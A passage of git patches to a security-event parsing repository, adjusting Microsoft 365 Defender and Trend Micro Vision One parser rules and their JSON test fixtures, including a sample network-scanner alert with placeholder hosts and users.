+        "AttachmentCount": 0,
+        "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}",
+        "Connectors": "Relai SMTP interne",
+        "DeliveryAction": "Delivered",
+        "DeliveryLocation": "Inbox/folder",
+        "EmailClusterId": "2633942188",
+        "EmailDirection": "Inbound",
+        "EmailLanguage": "en",
+        "OrgLevelAction": "Allow",
+        "OrgLevelPolicy": "Connection policy",
+        "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef",
+        "SenderFromDomain": "test.fr",
+        "UrlCount": 0
+      }
+    },
+    "email": {
+      "direction": "inbound",
+      "from": {
+        "address": [
+          "john.doe@test.fr"
+        ]
+      },
+      "local_id": "12345678-1234-abcd-ef90-abcdef123456",
+      "message_id": "<20241028141819.43623347A8F@test.fr>",
+      "subject": "EMAIL Subject",
+      "to": {
+        "address": [
+          "alan.smithee@test.fr"
+        ]
+      }
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c"
+        }
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    }
+  }
+}
\ No newline at end of file

From 94649a4b22251fe173eb508355223e3f8e67a851 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Fri, 22 Nov 2024 12:16:03 +0100
Subject: [PATCH 281/317] Enhanced smart descriptions

---
 .../_meta/smart-descriptions.json                     | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
index 6232e66f8..2d1728daa 100644
--- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
+++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
@@ -9,6 +9,17 @@
       { "field": "action.type" }
     ]
   },
+  {
+    "value": "New {action.type} incident received: {microsoft.defender.investigation.name}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "cloud_app_events"
+      },
+      { "field": "action.type" },
+      { "field": "microsoft.defender.investigation.name" }
+    ]
+  },
   {
     "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}",
     "conditions": [

From 1bb05b973e9cb21fae745b7ce6eabd0f184a55eb Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Fri, 22 Nov 2024 13:55:16 +0100
Subject: [PATCH 282/317] Deleted device_events exceptions

---
 .../microsoft-365-defender/ingest/parser.yml  |  4 +-
 ...test_device_event_sensitive_file_read.json | 81 +++++++++----------
 .../tests/test_device_events_2.json           | 11 ++-
 ..._device_events_shell_link_create_file.json | 74 +++++++++--------
 .../tests/test_device_process_created.json    |  8 +-
 .../test_devices_events_script_content.json   | 11 ++-
 6 files changed, 91 insertions(+), 98 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index f60d9b6f0..0a33f577f 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -41,9 +41,9 @@ pipeline:
         output_field: "data"
   - name: set_common_fields
   - name: set_process_events
-    filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}'
+    filter: '{{json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}'
   - name: set_process_deviceprocess_events
-    filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}'
+    filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}'
   - name: set_alert_evidence_fields
     filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}'
   - name: set_alert_info_fields
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
index fedd99aea..413d002c1 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
@@ -24,18 +24,16 @@
       "properties": {
         "AccountSid": "S-1-2-3",
         "process": {
-          "parent": {
-            "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
-            "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
-            "FileSize": 3316224,
-            "LogonId": "5223047",
-            "VersionInfoCompanyName": "Test Corporation",
-            "VersionInfoFileDescription": "Browser EXE",
-            "VersionInfoInternalFileName": "Browser.EXE",
-            "VersionInfoOriginalFileName": "Browser.EXE",
-            "VersionInfoProductName": "Test Product",
-            "VersionInfoProductVersion": "1, 0, 0, 1"
-          }
+          "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456",
+          "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
+          "FileSize": 3316224,
+          "LogonId": "5223047",
+          "VersionInfoCompanyName": "Test Corporation",
+          "VersionInfoFileDescription": "Browser EXE",
+          "VersionInfoInternalFileName": "Browser.EXE",
+          "VersionInfoOriginalFileName": "Browser.EXE",
+          "VersionInfoProductName": "Test Product",
+          "VersionInfoProductVersion": "1, 0, 0, 1"
         }
       },
       "type": "SensitiveFileRead"
@@ -57,37 +55,38 @@
       }
     },
     "process": {
-      "name": "FileName.mdb",
+      "args": [
+        "/DBMode",
+        "/Network",
+        "/ProjectID",
+        "/Ticket",
+        "0",
+        "0",
+        "12345678-1234-5678-9012-345678901234",
+        "123456789"
+      ],
+      "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
+      "executable": "c:\\program files (x86)\\browser.exe",
+      "hash": {
+        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+        "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+      },
+      "name": "browser.exe",
       "parent": {
-        "args": [
-          "/DBMode",
-          "/Network",
-          "/ProjectID",
-          "/Ticket",
-          "0",
-          "0",
-          "12345678-1234-5678-9012-345678901234",
-          "123456789"
-        ],
-        "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0",
-        "executable": "c:\\program files (x86)\\browser.exe",
-        "hash": {
-          "md5": "51a9cac9c4e8da44ffd7502be17604ee",
-          "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
-          "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
-        },
-        "name": "browser.exe",
-        "pid": 1328,
-        "start": "2024-11-12T10:17:23.990532Z",
-        "user": {
-          "domain": "company",
-          "email": "USERNAME@COMPANY.COM",
-          "id": "S-1-2-3",
-          "name": "username"
-        },
-        "working_directory": "c:\\program files (x86)"
+        "name": "Windows.exe",
+        "pid": 1820,
+        "start": "2024-10-14T05:47:54.324381Z"
+      },
+      "pid": 1328,
+      "start": "2024-11-12T10:17:23.990532Z",
+      "user": {
+        "domain": "company",
+        "email": "USERNAME@COMPANY.COM",
+        "id": "S-1-2-3",
+        "name": "username"
       },
-      "working_directory": "C:"
+      "working_directory": "c:\\program files (x86)"
     },
     "related": {
       "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
index 494baa569..4964dae1f 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json
@@ -17,9 +17,7 @@
     "action": {
       "properties": {
         "process": {
-          "parent": {
-            "LogonId": "0"
-          }
+          "LogonId": "0"
         }
       },
       "type": "ScriptContent"
@@ -42,9 +40,10 @@
     },
     "process": {
       "parent": {
-        "pid": 417271,
-        "start": "2024-10-22T15:09:08.624070Z"
-      }
+        "pid": 0
+      },
+      "pid": 417271,
+      "start": "2024-10-22T15:09:08.624070Z"
     },
     "related": {
       "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
index 37a646715..48696c644 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
@@ -23,18 +23,16 @@
     "action": {
       "properties": {
         "process": {
-          "parent": {
-            "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
-            "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
-            "FileSize": 1621656,
-            "LogonId": "8066492",
-            "VersionInfoCompanyName": "Microsoft Corporation",
-            "VersionInfoFileDescription": "Microsoft Word",
-            "VersionInfoInternalFileName": "WinWord",
-            "VersionInfoOriginalFileName": "WinWord.exe",
-            "VersionInfoProductName": "Microsoft Office",
-            "VersionInfoProductVersion": "16.0.17928.20216"
-          }
+          "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
+          "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+          "FileSize": 1621656,
+          "LogonId": "8066492",
+          "VersionInfoCompanyName": "Microsoft Corporation",
+          "VersionInfoFileDescription": "Microsoft Word",
+          "VersionInfoInternalFileName": "WinWord",
+          "VersionInfoOriginalFileName": "WinWord.exe",
+          "VersionInfoProductName": "Microsoft Office",
+          "VersionInfoProductVersion": "16.0.17928.20216"
         }
       },
       "type": "ShellLinkCreateFileEvent"
@@ -60,34 +58,34 @@
       }
     },
     "process": {
-      "name": "FILENAME.LNK",
+      "args": [
+        "\"\"",
+        "\"I:\\COMPANY\\Service\\FILE.doc\"",
+        "/n",
+        "/o"
+      ],
+      "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+      "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe",
+      "hash": {
+        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+        "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+      },
+      "name": "winword.exe",
       "parent": {
-        "args": [
-          "\"\"",
-          "\"I:\\COMPANY\\Service\\FILE.doc\"",
-          "/n",
-          "/o"
-        ],
-        "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
-        "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe",
-        "hash": {
-          "md5": "51a9cac9c4e8da44ffd7502be17604ee",
-          "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
-          "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
-        },
-        "name": "winword.exe",
-        "pid": 20948,
-        "start": "2024-11-12T10:02:28.777910Z",
-        "user": {
-          "domain": "company",
-          "email": "JOHNDOE@COMPANY.COM",
-          "id": "S-1-2-3",
-          "name": "jdoe"
-        },
-        "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16"
+        "name": "explorer.exe",
+        "pid": 14616,
+        "start": "2024-11-12T08:47:41.952077Z"
+      },
+      "pid": 20948,
+      "start": "2024-11-12T10:02:28.777910Z",
+      "user": {
+        "domain": "company",
+        "email": "JOHNDOE@COMPANY.COM",
+        "id": "S-1-2-3",
+        "name": "jdoe"
       },
-      "start": "2024-11-06T16:05:23.113802Z",
-      "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office"
+      "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16"
     },
     "related": {
       "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
index 7acf31f01..cd2ca7981 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
@@ -29,11 +29,9 @@
       }
     },
     "process": {
-      "parent": {
-        "user": {
-          "domain": "autorite nt",
-          "name": "syst\u00e8me"
-        }
+      "user": {
+        "domain": "autorite nt",
+        "name": "syst\u00e8me"
       }
     }
   }
diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
index 72f93da4e..c632ebbfa 100644
--- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
+++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
@@ -17,9 +17,7 @@
     "action": {
       "properties": {
         "process": {
-          "parent": {
-            "LogonId": "0"
-          }
+          "LogonId": "0"
         }
       },
       "type": "ScriptContent"
@@ -42,9 +40,10 @@
     },
     "process": {
       "parent": {
-        "pid": 423638,
-        "start": "2024-10-22T15:09:47.165481Z"
-      }
+        "pid": 0
+      },
+      "pid": 423638,
+      "start": "2024-10-22T15:09:47.165481Z"
     },
     "related": {
       "hash": [

From 3c5af0dd65f309e8d14b9d0a538745160ca82713 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Mon, 25 Nov 2024 12:09:53 +0200
Subject: [PATCH 283/317] Fixes and improvements

---
 .../trend-micro-vision-one/_meta/manifest.yml        |  2 +-
 Trend Micro/trend-micro-vision-one/ingest/parser.yml | 10 ++++++++--
 .../tests/test_internal_network_scanner.json         |  8 +++-----
 .../trend-micro-vision-one/tests/test_process.json   | 12 ++++++++----
 .../trend-micro-vision-one/tests/test_registry.json  | 12 +++++++-----
 5 files changed, 27 insertions(+), 17 deletions(-)

diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml
index 8363b7b96..da8360194 100644
--- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml	
+++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml	
@@ -1,7 +1,7 @@
 uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e
 automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05
 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6
-name: Trend Micro Vision One
+name: Trend Micro Vision One [BETA]
 slug: trend-micro-vision-one
 
 description: >-
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index a13ee54b2..3446a59f6 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
@@ -25,8 +25,6 @@ stages:
       - set:
           "@timestamp": "{{parsed_event.message.createdDateTime}}"
 
-          organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}"
-          organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}"
           host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}"
           host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}"
 
@@ -39,6 +37,14 @@ stages:
 
           event.url: "{{parsed_event.message.model.workbenchLink}}"
 
+      - set:
+          user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}"
+
+      - set:
+          user.name: "{{final.user.id.split('\\\\')[0]}}"
+          user.domain: "{{final.user.id.split('\\\\')[1]}}"
+        filter: "{{final.user.id != null}}"
+
       - set:
           process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}"
           process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}"
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
index e6bcf0088..769477b65 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json	
@@ -3,7 +3,7 @@
     "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}"
   },
   "expected": {
-    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}",
+    "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": 